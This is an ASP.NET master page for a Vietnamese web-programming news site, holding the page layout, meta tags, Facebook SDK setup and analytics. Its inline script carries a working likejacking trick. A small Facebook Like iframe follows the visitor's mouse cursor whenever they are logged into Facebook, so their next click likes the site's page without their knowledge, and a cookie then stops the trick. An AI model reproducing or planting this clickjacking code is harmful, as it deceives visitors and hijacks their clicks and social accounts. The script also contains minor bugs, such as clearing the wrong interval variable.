<%@ Master Language="C#" AutoEventWireup="true" EnableViewState="false" CodeFile="Theme.master.cs"
    Inherits="Theme" %>

<%@ Register Src="usercontrols/ucFooter1.ascx" TagName="ucFooter1" TagPrefix="uc1" %>
<%@ Register Src="usercontrols/ucCopyRight.ascx" TagName="ucCopyRight" TagPrefix="uc2" %>
<%@ Register Src="usercontrols/ucRightFacebook.ascx" TagName="ucRightFacebook" TagPrefix="uc3" %>
<%@ Register Src="usercontrols/ucHeader.ascx" TagName="ucHeader" TagPrefix="uc4" %>
<%@ Register Src="usercontrols/ucHeaderFix.ascx" TagName="ucHeaderFix" TagPrefix="uc5" %>
<%@ Register Src="usercontrols/ucNavigation.ascx" TagName="ucNavigation" TagPrefix="uc6" %>
<%@ Register Src="usercontrols/ucRightNews1.ascx" TagName="ucRightNews1" TagPrefix="uc7" %>
<%@ Register Src="usercontrols/ucRightSearch.ascx" TagName="ucRightSearch" TagPrefix="uc8" %>
<%@ Register Src="usercontrols/ucNewsTicker.ascx" TagName="ucNewsTicker" TagPrefix="uc11" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="vi">
<head runat="server">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="language" content="english, en, Vietnamese,vn" />
    <asp:Literal ID="lrBase" runat="server"></asp:Literal>
    <link rel="shortcut icon" href="http://www.hoclaptrinhweb.com/favicon.png" />
    <title></title>
    <!--[if lt IE 9]>
        <script type="text/javascript" src="http://www.hoclaptrinhweb.com/js/IE9.js"></script>
        <script type="text/javascript" src="http://www.hoclaptrinhweb.com/js/html5.js"></script>
    <![endif]-->
    <asp:Literal ID="lrStyle" runat="server"></asp:Literal>
    <asp:Literal ID="lrScript" runat="server"></asp:Literal>
    <asp:Literal ID="lrScriptDetail" runat="server"></asp:Literal>
    <meta runat="server" id="metaDesc" name="description" content="Hoclaptrinhweb.com là một website chuyên về Lập trình - Thiết kế website Graphic - HTML - CSS - Jquery - Photography - Tin công nghệ - Game. Hoclaptrinhweb.com là một website tổng hợp thông tin hoàn toàn được điều khiển tự động bởi máy tính. Mỗi ngày  tin tức từ  nhiều nguồn chính thức của các web điện tử và trang tin được Hoclaptrinhweb.com tự động tổng hợp, phân loại, phát hiện các bài đăng lại...." />
    <meta runat="server" id="metaKeywords" name="keywords" content="web online, hoc lap trinh web, hoc lap trinh, học lập trình web, lập trình web" />
    <meta property="og:title" content="" runat="server" id="metaTitle" />
    <meta property="og:type" content="website" />
    <meta property="og:site_name" content="http://www.hoclaptrinhweb.com" />
    <meta property="og:url" content="" runat="server" id="metaUrl" />
    <meta property="og:image" content="" runat="server" id="metaImage" />
    <meta property="og:description" content="Hoclaptrinhweb.com là một website chuyên về Lập trình - Thiết kế website Graphic - HTML - CSS - Jquery - Photography - Tin công nghệ - Game. Hoclaptrinhweb.com là một website tổng hợp thông tin hoàn toàn được điều khiển tự động bởi máy tính. Mỗi ngày  tin tức từ  nhiều nguồn chính thức của các web điện tử và trang tin được Hoclaptrinhweb.com tự động tổng hợp, phân loại, phát hiện các bài đăng lại...." id="metaDescFb" />
    <meta prefix="fb: http://ogp.me/ns/fb#" property="fb:app_id" content="312319252170353" />
    <meta http-equiv="REFRESH" content="1800" />
    <meta name="alexaVerifyID" content="N-eLjeUgLZY0YPY61XUqot_heyI" />
    <meta name="robots" content="index,follow" />
    <meta name="Googlebot" content="INDEX,FOLLOW" />
</head>
<body>
    <div id='fb-root'>
    </div>
    <style>

    </style>
    <div id="icontainer">
        <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Ffacebook.com%2Fhoclaptrinhweb&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border: none; overflow: hidden; width: 50px; height: 23px; position: absolute; left: -30px;" allowtransparency="true" id="fbframe" name="fbframe"></iframe>
    </div>
    <script type="text/javascript">
        if (navigator.userAgent.match(/iPad|android|webOS|iPod|BlackBerry|iPhone|ZuneWP|WPDesktop|Windows Phone/i)) {
            window.location = 'http://m.hoclaptrinhweb.com' + window.location.pathname;
        }else if (navigator.userAgent.match(/midp|mobile|cldc|mobi/i)) {
            window.location = "http://m.hoclaptrinhweb.com" + +window.location.pathname;
        };
    </script>
    <script type="text/javascript">
        var graphApiInitialized = false;
        var status = '';
        window.fbAsyncInit = function () {
            FB.init({
                appId: '312319252170353',
                status: true,
                cookie: true,
                xfbml: true,
                oauth: true
            });
            FB.getLoginStatus(function (response) {
                if (response.status === 'connected') {
                    status = 'c';
                } else if (response.status === 'not_authorized') {
                    status = 'n';
                } else {
                    status = '';
                };
            });
            graphApiInitialized = true;
        };

        (function () {
            var e = document.createElement('script');
            e.src = 'http://connect.facebook.net/en_US/all.js';
            e.async = true;
            document.getElementById('fb-root').appendChild(e);
        }());

        var inter;
        $(function () {
            inter = setInterval("updateActiveElement();", 50);
        });

        function updateActiveElement() {
            if ($(document.activeElement).attr('id') == "fbframe") {
                clearInterval(interval);
                setCookie('vnn', '1', 10);
            }
        };
        var icon = document.getElementById('icontainer');
        function mouseFollower(e) {
            if (window.event) {
                icon.style.top = (e.pageY - 5) + 'px';
                icon.style.left = (e.pageX - 5) + 'px';
            }
            else {
                icon.style.top = (e.pageY - 5) + 'px';
                icon.style.left = (e.pageX - 5) + 'px';
            }
        };
        $(document).mousemove(function (e) {
            if (getCookie('vnn') != '1' && graphApiInitialized == true && status != '') {
                $('#icontainer').show();
                mouseFollower(e);
            } else {
                $('#icontainer').hide();
            };
        });
    </script>
    <form id="form1" runat="server">
        <uc5:ucHeaderFix ID="ucHeaderFix1" runat="server" />
        <uc4:ucHeader ID="ucHeader1" runat="server" />
        <uc6:ucNavigation ID="ucNavigation1" runat="server" />
        <uc11:ucNewsTicker ID="ucNewsTicker1" runat="server" />
        <div class="inner">
            <div class="container">
                <div class="main">
                    <asp:ContentPlaceHolder ID="ContentPlaceHolder1" runat="server">
                    </asp:ContentPlaceHolder>
                </div>
                <div class="sidebar">
                    <uc8:ucRightSearch ID="ucRightSearch1" runat="server" />
                    <uc7:ucRightNews1 ID="ucRightNews11" runat="server" />
                    <uc3:ucRightFacebook ID="ucRightFacebook1" runat="server" />
                </div>
                <div class="clear">
                </div>
            </div>
        </div>
        <uc1:ucFooter1 ID="ucFooter11" runat="server" />
        <uc2:ucCopyRight ID="ucCopyRight1" runat="server" />
        <script type="text/javascript">
            var _gaq = _gaq || [];
            _gaq.push(['_setAccount', 'UA-30339288-1']);
            _gaq.push(['_setDomainName', 'hoclaptrinhweb.com']);
            _gaq.push(['_setAllowLinker', true]);
            _gaq.push(['_trackPageview']);

            (function () {
                var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
                ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
                var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
            })();

        </script>
    </form>
</body>
</html>
